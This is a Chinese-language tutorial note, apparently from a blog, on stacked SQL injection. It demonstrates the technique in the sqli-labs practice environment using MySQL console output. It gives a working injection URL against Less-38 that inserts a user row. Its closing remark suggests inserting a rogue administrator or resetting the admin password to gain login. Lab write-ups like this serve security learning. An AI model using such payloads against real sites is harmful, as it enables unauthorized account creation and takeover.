SQL注入- 堆叠注入
SQL注入- 堆叠注入
1.堆叠查询注入
stacked injections(堆叠注入)从名词的含义就可以看到应该是一堆sql语句(多条)一起执行。而在真实的运用中也是这样的,我们知道在mysql 中,主要是命令行中,每一条语句结尾加;表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做stacked injection。
在sql";" 语句后面加上另一条sql语句两条语句都会执行
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| challenges |
| mysql |
| performance_schema |
| security |
+--------------------+
5 rows in set (0.00 sec)
mysql> use security;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> select * from users;select * from emails;
+----+----------+------------+
| id | username | password |
+----+----------+------------+
| 1 | Dumb | Dumb |
| 2 | Angelina | I-kill-you |
| 3 | Dummy | p@ssword |
| 4 | secure | crappy |
| 5 | stupid | stupidity |
| 6 | superman | genious |
| 7 | batman | mob!le |
| 8 | admin | 111111 |
| 9 | admin1 | admin1 |
| 10 | admin2 | 111111 |
| 11 | admin3 | admin3 |
| 12 | dhakkan | dumbo |
| 14 | admin4 | admin4 |
| 15 | admin'# | 123456 |
| 16 | admin2'# | 123456 |
+----+----------+------------+
15 rows in set (0.00 sec)
+----+------------------------+
| id | email_id |
+----+------------------------+
| 1 | Dumb@dhakkan.com |
| 2 | Angel@iloveu.com |
| 3 | Dummy@dhakkan.local |
| 4 | secure@dhakkan.local |
| 5 | stupid@dhakkan.local |
| 6 | superman@dhakkan.local |
| 7 | batman@dhakkan.local |
| 8 | admin@dhakkan.com |
+----+------------------------+
8 rows in set (0.00 sec)
在sqli-libs靶场38关注入
http://1.12.250.218:100/Less-38/index.php?id=1 ';insert into users(id,username,password) values ( 39, 'less38 ', 'hello ')--+
注入成功
mysql> select * from users;
+----+----------+------------+
| id | username | password |
+----+----------+------------+
| 1 | Dumb | Dumb |
| 2 | Angelina | I-kill-you |
| 3 | Dummy | p@ssword |
| 4 | secure | crappy |
| 5 | stupid | stupidity |
| 6 | superman | genious |
| 7 | batman | mob!le |
| 8 | admin | 111111 |
| 9 | admin1 | admin1 |
| 10 | admin2 | 111111 |
| 11 | admin3 | admin3 |
| 12 | dhakkan | dumbo |
| 14 | admin4 | admin4 |
| 15 | admin'# | 123456 |
| 16 | admin2'# | 123456 |
| 39 | less38 | hello |
+----+----------+------------+
16 rows in set (0.00 sec)
备注:堆叠注入的可以运用于创建用户由于我们使用网站用户进行注入不能查看到数据库的密码,密码是加密的,但是我们可以使用堆叠注入在管理员的数据库表中插入一条我们创建的管理员,我们就可以使用这个管理员账号进行登录,但是前提是网站的管理员必须是高权限才能完全创建用户。也可以使用update更新管理员用户密码。
参考链接: